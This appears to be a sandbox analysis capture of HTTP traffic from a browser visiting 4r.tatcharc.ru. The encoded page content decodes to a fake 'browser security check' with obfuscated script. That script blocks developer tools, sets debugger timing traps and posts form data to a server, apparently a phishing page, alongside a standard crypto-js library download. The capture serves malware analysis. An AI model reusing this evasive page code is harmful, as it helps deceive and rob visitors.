                                                                                                        2024-12-18 17:49:03 UTC1369INData Raw: 55 56 47 5a 4f 64 32 68 76 54 53 42 77 65 32 31 68 63 6d 64 70 62 69 31 30 62 33 41 36 4d 44 74 74 59 58 4a 6e 61 57 34 74 59 6d 39 30 64 47 39 74 4f 6a 46 79 5a 57 30 37 66 51 30 4b 49 33 42 6f 56 46 52 6d 54 6e 64 6f 62 30 30 75 59 32 46 77 64 47 4e 6f 59 53 31 6a 62 32 35 30 59 57 6c 75 5a 58 4a 37 63 47 39 7a 61 58 52 70 62 32 34 36 49 48 4a 6c 62 47 46 30 61 58 5a 6c 4f 33 52 76 63 44 6f 67 4e 44 6c 77 65 44 73 76 4b 6e 64 70 5a 48 52 6f 4f 69 41 78 4d 44 41 6c 4f 79 6f 76 63 47 46 6b 5a 47 6c 75 5a 79 31 79 61 57 64 6f 64 44 6f 67 64 6d 46 79 4b 43 30 74 59 6e 4d 74 5a 33 56 30 64 47 56 79 4c 58 67 73 49 43 34 33 4e 58 4a 6c 62 53 6b 37 63 47 46 6b 5a 47 6c 75 5a 79 31 73 5a 57 5a 30 4f 69 42 32 59 58 49 6f 4c 53 31 69 63 79 31 6e 64 58 52 30 5a 58
                                                                                                        Data Ascii: UVGZOd2hvTSBwe21hcmdpbi10b3A6MDttYXJnaW4tYm90dG9tOjFyZW07fQ0KI3BoVFRmTndob00uY2FwdGNoYS1jb250YWluZXJ7cG9zaXRpb246IHJlbGF0aXZlO3RvcDogNDlweDsvKndpZHRoOiAxMDAlOyovcGFkZGluZy1yaWdodDogdmFyKC0tYnMtZ3V0dGVyLXgsIC43NXJlbSk7cGFkZGluZy1sZWZ0OiB2YXIoLS1icy1ndXR0ZX
                                                                                                        2024-12-18 17:49:03 UTC1369INData Raw: 62 6e 51 70 49 48 73 4e 43 69 41 67 49 43 42 70 5a 69 41 6f 5a 58 5a 6c 62 6e 51 75 61 32 56 35 51 32 39 6b 5a 53 41 39 50 54 30 67 4d 54 49 7a 4b 53 42 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 56 32 5a 57 35 30 4c 6e 42 79 5a 58 5a 6c 62 6e 52 45 5a 57 5a 68 64 57 78 30 4b 43 6b 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 48 4a 6c 64 48 56 79 62 69 42 6d 59 57 78 7a 5a 54 73 4e 43 69 41 67 49 43 42 39 44 51 6f 4e 43 69 41 67 49 43 42 70 5a 69 41 6f 44 51 6f 67 49 43 41 67 49 43 41 67 49 43 68 6c 64 6d 56 75 64 43 35 6a 64 48 4a 73 53 32 56 35 49 43 59 6d 49 47 56 32 5a 57 35 30 4c 6d 74 6c 65 55 4e 76 5a 47 55 67 50 54 30 39 49 44 67 31 4b 53 42 38 66 41 30 4b 49 43 41 67 49 43 41 67 49 43 41 6f 5a 58 5a 6c 62 6e 51 75 59 33 52 79 62 45 74 6c 65 53 41
                                                                                                        Data Ascii: bnQpIHsNCiAgICBpZiAoZXZlbnQua2V5Q29kZSA9PT0gMTIzKSB7DQogICAgICAgIGV2ZW50LnByZXZlbnREZWZhdWx0KCk7DQogICAgICAgIHJldHVybiBmYWxzZTsNCiAgICB9DQoNCiAgICBpZiAoDQogICAgICAgIChldmVudC5jdHJsS2V5ICYmIGV2ZW50LmtleUNvZGUgPT09IDg1KSB8fA0KICAgICAgICAoZXZlbnQuY3RybEtleSA
                                                                                                        2024-12-18 17:49:03 UTC1369INData Raw: 6c 68 6f 57 6e 5a 4b 65 6b 30 67 50 53 42 77 5a 58 4a 6d 62 33 4a 74 59 57 35 6a 5a 53 35 75 62 33 63 6f 4b 54 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 5a 47 56 69 64 57 64 6e 5a 58 49 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 4e 76 62 6e 4e 30 49 46 68 50 56 45 31 51 59 56 64 47 64 31 55 67 50 53 42 77 5a 58 4a 6d 62 33 4a 74 59 57 35 6a 5a 53 35 75 62 33 63 6f 4b 54 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 61 57 59 67 4b 46 68 50 56 45 31 51 59 56 64 47 64 31 55 67 4c 53 42 6a 5a 6d 4a 59 61 46 70 32 53 6e 70 4e 49 44 34 67 56 6c 5a 30 57 6d 56 35 53 46 68 32 63 53 41 6d 4a 69 41 68 61 33 70 32 62 47 78 69 53 32 6c 6f 53 53 6b 67 65 77 30 4b 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 51 56 6c 75 56 32 56 33 64 33 5a 35 53 79 41 39 49 48 52 79
                                                                                                        Data Ascii: lhoWnZKek0gPSBwZXJmb3JtYW5jZS5ub3coKTsNCiAgICAgICAgZGVidWdnZXI7DQogICAgICAgIGNvbnN0IFhPVE1QYVdGd1UgPSBwZXJmb3JtYW5jZS5ub3coKTsNCiAgICAgICAgaWYgKFhPVE1QYVdGd1UgLSBjZmJYaFp2SnpNID4gVlZ0WmV5SFh2cSAmJiAha3p2bGxiS2loSSkgew0KICAgICAgICAgICAgQVluV2V3d3Z5SyA9IHRy
                                                                                                        2024-12-18 17:49:03 UTC1369INData Raw: 39 33 62 69 49 2b 44 51 6f 38 61 57 35 77 64 58 51 67 64 48 6c 77 5a 54 30 69 61 47 6c 6b 5a 47 56 75 49 69 42 70 5a 44 30 69 59 6d 78 30 5a 47 52 68 64 47 45 69 49 47 35 68 62 57 55 39 49 6d 4a 73 64 47 52 6b 59 58 52 68 49 69 42 32 59 57 78 31 5a 54 30 69 49 6a 34 4e 43 6a 77 76 5a 6d 39 79 62 54 34 4e 43 6a 77 76 5a 47 6c 32 50 67 30 4b 50 47 52 70 64 69 42 6a 62 47 46 7a 63 7a 30 69 64 47 56 34 64 43 31 6a 5a 57 35 30 5a 58 49 69 49 47 6c 6b 50 53 4a 6f 54 32 56 46 54 31 52 51 61 58 46 57 49 6a 34 4e 43 6b 56 75 63 33 56 79 61 57 35 6e 49 48 6c 76 64 58 49 67 63 32 46 6d 5a 58 52 35 49 48 64 70 64 47 67 67 59 6e 4a 76 64 33 4e 6c 63 69 42 7a 5a 57 4e 31 63 6d 6c 30 65 53 42 6a 61 47 56 6a 61 33 4d 75 44 51 6f 38 4c 32 52 70 64 6a 34 4e 43 6a 77 76 5a
                                                                                                        Data Ascii: 93biI+DQo8aW5wdXQgdHlwZT0iaGlkZGVuIiBpZD0iYmx0ZGRhdGEiIG5hbWU9ImJsdGRkYXRhIiB2YWx1ZT0iIj4NCjwvZm9ybT4NCjwvZGl2Pg0KPGRpdiBjbGFzcz0idGV4dC1jZW50ZXIiIGlkPSJoT2VFT1RQaXFWIj4NCkVuc3VyaW5nIHlvdXIgc2FmZXR5IHdpdGggYnJvd3NlciBzZWN1cml0eSBjaGVja3MuDQo8L2Rpdj4NCjwvZ
                                                                                                        2024-12-18 17:49:03 UTC1369INData Raw: 6f 4b 47 39 76 56 55 4e 34 63 6c 52 46 59 6e 41 73 49 48 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 62 57 56 30 61 47 39 6b 4f 69 41 69 55 45 39 54 56 43 49 73 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 4a 76 5a 48 6b 36 49 47 35 6c 64 79 42 47 62 33 4a 74 52 47 46 30 59 53 68 6c 5a 58 64 76 56 48 56 54 65 6c 64 4f 4b 51 30 4b 49 43 41 67 49 48 30 70 4c 6e 52 6f 5a 57 34 6f 63 6d 56 7a 63 47 39 75 63 32 55 67 50 54 34 67 65 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 79 5a 58 52 31 63 6d 34 67 63 6d 56 7a 63 47 39 75 63 32 55 75 61 6e 4e 76 62 69 67 70 4f 77 30 4b 49 43 41 67 49 48 30 70 4c 6e 52 6f 5a 57 34 6f 5a 47 46 30 59 53 41 39 50 69 42 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 6c 6d 4b 47 52 68 64 47 46 62 4a 33 4e 30 59 58 52 31 63 79 64 64 49 44
                                                                                                        Data Ascii: oKG9vVUN4clRFYnAsIHsNCiAgICAgICAgbWV0aG9kOiAiUE9TVCIsDQogICAgICAgIGJvZHk6IG5ldyBGb3JtRGF0YShlZXdvVHVTeldOKQ0KICAgIH0pLnRoZW4ocmVzcG9uc2UgPT4gew0KICAgICAgICByZXR1cm4gcmVzcG9uc2UuanNvbigpOw0KICAgIH0pLnRoZW4oZGF0YSA9PiB7DQogICAgICAgIGlmKGRhdGFbJ3N0YXR1cyddID
                                                                                                        2024-12-18 17:49:03 UTC1369INData Raw: 74 28 27 2e 27 29 2e 73 6c 69 63 65 28 2d 32 29 2e 6a 6f 69 6e 28 27 2e 27 29 3b 0d 0a 0d 0a 69 66 28 6b 75 57 52 67 45 74 64 72 6d 20 3d 3d 20 78 54 52 66 6c 51 4c 53 59 6f 29 7b 0d 0a 63 6f 6e 73 74 20 53 76 72 74 78 50 4b 48 64 55 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 2e 73 70 6c 69 74 28 27 25 32 33 27 29 5b 30 5d 2e 73 70 6c 69 74 28 27 25 33 46 27 29 5b 30 5d 3b 0d 0a 69 66 20 28 4b 4c 56 6a 45 65 56 71 51 6a 2e 70 61 74 68 6e 61 6d 65 2e 65 6e 64 73 57 69 74 68 28 27 2f 27 29 29 20 7b 0d 0a 4b 4c 56 6a 45 65 56 71 51 6a 2e 70 61 74 68 6e 61 6d 65 20 3d 20 4b 4c 56 6a 45 65 56 71 51 6a 2e 70 61 74 68 6e 61 6d 65 2e 73 6c 69 63 65 28 30 2c 20 2d 31 29 3b 0d 0a 7d 0d 0a 63 6f 6e 73 74 20 49 49 43 75 4f 49 45
                                                                                                        Data Ascii: t('.').slice(-2).join('.');if(kuWRgEtdrm == xTRflQLSYo){const SvrtxPKHdU = window.location.pathname.split('%23')[0].split('%3F')[0];if (KLVjEeVqQj.pathname.endsWith('/')) {KLVjEeVqQj.pathname = KLVjEeVqQj.pathname.slice(0, -1);}const IICuOIE
                                                                                                        2024-12-18 17:49:03 UTC1369INData Raw: 62 57 56 6b 61 57 45 67 4b 47 31 70 62 69 31 33 61 57 52 30 61 44 6f 78 4d 6a 41 77 63 48 67 70 65 77 30 4b 49 33 42 6f 56 46 52 6d 54 6e 64 6f 62 30 30 67 61 44 52 37 5a 6d 39 75 64 43 31 7a 61 58 70 6c 4f 6a 45 75 4e 58 4a 6c 62 54 74 39 44 51 70 39 44 51 6f 6a 63 47 68 55 56 47 5a 4f 64 32 68 76 54 53 42 77 65 32 31 68 63 6d 64 70 62 69 31 30 62 33 41 36 4d 44 74 74 59 58 4a 6e 61 57 34 74 59 6d 39 30 64 47 39 74 4f 6a 46 79 5a 57 30 37 66 51 30 4b 49 33 42 6f 56 46 52 6d 54 6e 64 6f 62 30 30 75 59 32 46 77 64 47 4e 6f 59 53 31 6a 62 32 35 30 59 57 6c 75 5a 58 4a 37 63 47 39 7a 61 58 52 70 62 32 34 36 49 48 4a 6c 62 47 46 30 61 58 5a 6c 4f 33 52 76 63 44 6f 67 4e 44 6c 77 65 44 73 76 4b 6e 64 70 5a 48 52 6f 4f 69 41 78 4d 44 41 6c 4f 79 6f 76 63 47 46
                                                                                                        Data Ascii: bWVkaWEgKG1pbi13aWR0aDoxMjAwcHgpew0KI3BoVFRmTndob00gaDR7Zm9udC1zaXplOjEuNXJlbTt9DQp9DQojcGhUVGZOd2hvTSBwe21hcmdpbi10b3A6MDttYXJnaW4tYm90dG9tOjFyZW07fQ0KI3BoVFRmTndob00uY2FwdGNoYS1jb250YWluZXJ7cG9zaXRpb246IHJlbGF0aXZlO3RvcDogNDlweDsvKndpZHRoOiAxMDAlOyovcGF
                                                                                                        2024-12-18 17:49:03 UTC1369INData Raw: 43 4a 68 59 6d 39 31 64 44 70 69 62 47 46 75 61 79 49 37 44 51 70 39 44 51 70 6b 62 32 4e 31 62 57 56 75 64 43 35 68 5a 47 52 46 64 6d 56 75 64 45 78 70 63 33 52 6c 62 6d 56 79 4b 43 64 72 5a 58 6c 6b 62 33 64 75 4a 79 77 67 5a 6e 56 75 59 33 52 70 62 32 34 6f 5a 58 5a 6c 62 6e 51 70 49 48 73 4e 43 69 41 67 49 43 42 70 5a 69 41 6f 5a 58 5a 6c 62 6e 51 75 61 32 56 35 51 32 39 6b 5a 53 41 39 50 54 30 67 4d 54 49 7a 4b 53 42 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 56 32 5a 57 35 30 4c 6e 42 79 5a 58 5a 6c 62 6e 52 45 5a 57 5a 68 64 57 78 30 4b 43 6b 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 48 4a 6c 64 48 56 79 62 69 42 6d 59 57 78 7a 5a 54 73 4e 43 69 41 67 49 43 42 39 44 51 6f 4e 43 69 41 67 49 43 42 70 5a 69 41 6f 44 51 6f 67 49 43 41 67 49 43 41 67
                                                                                                        Data Ascii: CJhYm91dDpibGFuayI7DQp9DQpkb2N1bWVudC5hZGRFdmVudExpc3RlbmVyKCdrZXlkb3duJywgZnVuY3Rpb24oZXZlbnQpIHsNCiAgICBpZiAoZXZlbnQua2V5Q29kZSA9PT0gMTIzKSB7DQogICAgICAgIGV2ZW50LnByZXZlbnREZWZhdWx0KCk7DQogICAgICAgIHJldHVybiBmYWxzZTsNCiAgICB9DQoNCiAgICBpZiAoDQogICAgICAg


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        1192.168.2.749782104.18.95.414439008C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 17:49:05 UTC646OUTGET /turnstile/v0/api.js?render=explicit HTTP/1.1
                                                                                                        Host: challenges.cloudflare.com
                                                                                                        Connection: keep-alive
                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                        Accept: */*
                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                        Sec-Fetch-Dest: script
                                                                                                        Referer: https://4r.tatcharc.ru/
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2024-12-18 17:49:05 UTC386INHTTP/1.1 302 Found
                                                                                                        Date: Wed, 18 Dec 2024 17:49:05 GMT
                                                                                                        Content-Length: 0
                                                                                                        Connection: close
                                                                                                        access-control-allow-origin: *
                                                                                                        cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=300, public
                                                                                                        cross-origin-resource-policy: cross-origin
                                                                                                        location: /turnstile/v0/b/787bc399e22f/api.js
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8f40fccecdb10f83-EWR
                                                                                                        alt-svc: h3=":443"; ma=86400


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        2192.168.2.749783104.17.25.144439008C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 17:49:05 UTC648OUTGET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1
                                                                                                        Host: cdnjs.cloudflare.com
                                                                                                        Connection: keep-alive
                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                        Accept: */*
                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                        Sec-Fetch-Dest: script
                                                                                                        Referer: https://4r.tatcharc.ru/
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2024-12-18 17:49:05 UTC952INHTTP/1.1 200 OK
                                                                                                        Date: Wed, 18 Dec 2024 17:49:05 GMT
                                                                                                        Content-Type: application/javascript; charset=utf-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Cache-Control: public, max-age=30672000
                                                                                                        ETag: W/"61182885-40eb"
                                                                                                        Last-Modified: Sat, 14 Aug 2021 20:33:09 GMT
                                                                                                        cf-cdnjs-via: cfworker/kv
                                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                                        Timing-Allow-Origin: *
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        CF-Cache-Status: MISS
                                                                                                        Expires: Mon, 08 Dec 2025 17:49:05 GMT
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0cJugSztXCmZVA6%2FjoXC%2BP%2FeR%2B80WBZ%2BY0mCrYvVKSMSIdgN0cwym2qB5llAisQZuF71xvpx270EF5zxzV8xKR4OOQ4p6o3PEopB510UyZXX0OraaOeiXOQI%2Fp2LQahXsttatiCJ"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                        Strict-Transport-Security: max-age=15780000
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8f40fccedff77cab-EWR
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        2024-12-18 17:49:05 UTC417INData Raw: 37 62 66 31 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 2c 6f 2c 73 2c 61 2c 68 2c 74 2c 65 2c 6c 2c 72 2c 69 2c 63 2c 66 2c 64 2c 75 2c 70 2c 53 2c 78 2c 62 2c 41 2c 48 2c 7a 2c 5f 2c 76 2c 67 2c 79 2c 42 2c 77 2c 6b 2c 6d 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 3d 55 7c 7c 66 75 6e 63 74 69 6f 6e 28 68 29 7b
                                                                                                        Data Ascii: 7bf1!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){
                                                                                                        2024-12-18 17:49:05 UTC1369INData Raw: 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3f 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 69 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 76 61 72 20 72 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 7c 7c 66 75
                                                                                                        Data Ascii: lThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||fu
                                                                                                        2024-12-18 17:49:05 UTC1369INData Raw: 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 77 6f 72 64 73 3d 74 68 69 73 2e 77 6f 72 64 73 2e 73 6c 69 63 65 28 30 29 2c 74 7d 2c 72 61 6e 64 6f 6d 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 5b 5d 2c 72 3d 30 3b 72 3c 74 3b 72 2b 3d 34 29 65 2e 70 75 73 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 69 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 29 74 72 79 7b 72 65 74 75 72 6e 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 28 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 31 29 29 5b 30 5d 7d 63 61 74 63 68 28 74 29 7b 7d 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 72 61 6e 64 6f 6d 42 79 74 65 73 29 74 72 79 7b 72 65
                                                                                                        Data Ascii: is);return t.words=this.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(function(){if(i){if("function"==typeof i.getRandomValues)try{return i.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof i.randomBytes)try{re
                                                                                                        2024-12-18 17:49:05 UTC1369INData Raw: 26 28 74 3d 66 2e 70 61 72 73 65 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 68 2e 63 65 69 6c 28 73 29 3a 68 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 6e 3d 68 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 61 3d 30 3b 61 3c 63 3b 61 2b 3d 6f 29 74
                                                                                                        Data Ascii: &(t=f.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?h.ceil(s):h.max((0|s)-this._minBufferSize,0))*o,n=h.min(4*c,n);if(c){for(var a=0;a<c;a+=o)t
                                                                                                        2024-12-18 17:49:05 UTC1369INData Raw: 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 45 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 45 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 45 5b 31 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 33 5d 3d 65 5b 33 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 32 5d 3e 3e 3e 30 3c 45 5b 32 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 34 5d 3d 65 5b 34 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 33 5d 3e 3e 3e 30 3c 45 5b 33 5d 3e 3e 3e 30 3f 31 3a 30 29 7c
                                                                                                        Data Ascii: his._X,e=this._C,r=0;r<8;r++)E[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<E[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<E[1]>>>0?1:0)|0,e[3]=e[3]+1295307597+(e[2]>>>0<E[2]>>>0?1:0)|0,e[4]=e[4]+3545052371+(e[3]>>>0<E[3]>>>0?1:0)|
                                                                                                        2024-12-18 17:49:06 UTC1369INData Raw: 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 3b 49 5b 72 5d 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 5e 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b 28 28 36 35 35 33 35 26 69 29 2a 69 7c 30 29 7d 74 5b 30 5d 3d 49 5b 30 5d 2b 28 49 5b 37 5d 3c 3c 31 36 7c 49 5b 37 5d 3e 3e 3e 31 36 29 2b 28 49 5b 36 5d 3c 3c 31 36 7c 49 5b 36 5d 3e 3e 3e 31 36 29 7c 30 2c 74 5b 31 5d 3d 49 5b 31 5d 2b 28 49 5b 30 5d 3c 3c 38 7c 49 5b 30 5d 3e 3e 3e 32 34 29 2b 49 5b 37 5d 7c 30 2c 74 5b 32 5d 3d 49 5b 32 5d 2b 28 49 5b 31 5d 3c 3c 31 36 7c 49 5b 31 5d 3e 3e 3e 31 36 29 2b 28 49 5b 30 5d 3c 3c 31 36 7c 49 5b 30 5d 3e 3e 3e 31 36 29
                                                                                                        Data Ascii: ;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16;I[r]=((n*n>>>17)+n*o>>>15)+o*o^((4294901760&i)*i|0)+((65535&i)*i|0)}t[0]=I[0]+(I[7]<<16|I[7]>>>16)+(I[6]<<16|I[6]>>>16)|0,t[1]=I[1]+(I[0]<<8|I[0]>>>24)+I[7]|0,t[2]=I[2]+(I[1]<<16|I[1]>>>16)+(I[0]<<16|I[0]>>>16)
                                                                                                        2024-12-18 17:49:06 UTC1369INData Raw: 65 4f 66 66 73 65 74 2c 74 2e 62 79 74 65 4c 65 6e 67 74 68 29 3a 74 29 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 62 79 74 65 4c 65 6e 67 74 68 2c 72 3d 5b 5d 2c 69 3d 30 3b 69 3c 65 3b 69 2b 2b 29 72 5b 69 3e 3e 3e 32 5d 7c 3d 74 5b 69 5d 3c 3c 32 34 2d 69 25 34 2a 38 3b 73 2e 63 61 6c 6c 28 74 68 69 73 2c 72 2c 65 29 7d 65 6c 73 65 20 73 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2e 70 72 6f 74 6f 74 79 70 65 3d 50 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 55 2c 6e 3d 74 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 2c 74 3d 74 2e 65 6e 63 3b 74 2e 55 74 66 31 36 3d 74 2e 55 74 66 31 36 42 45 3d 7b 73 74 72 69 6e 67 69 66 79 3a 66 75 6e 63 74 69 6f 6e
                                                                                                        Data Ascii: eOffset,t.byteLength):t)instanceof Uint8Array){for(var e=t.byteLength,r=[],i=0;i<e;i++)r[i>>>2]|=t[i]<<24-i%4*8;s.call(this,r,e)}else s.apply(this,arguments)}).prototype=P),function(){var t=U,n=t.lib.WordArray,t=t.enc;t.Utf16=t.Utf16BE={stringify:function
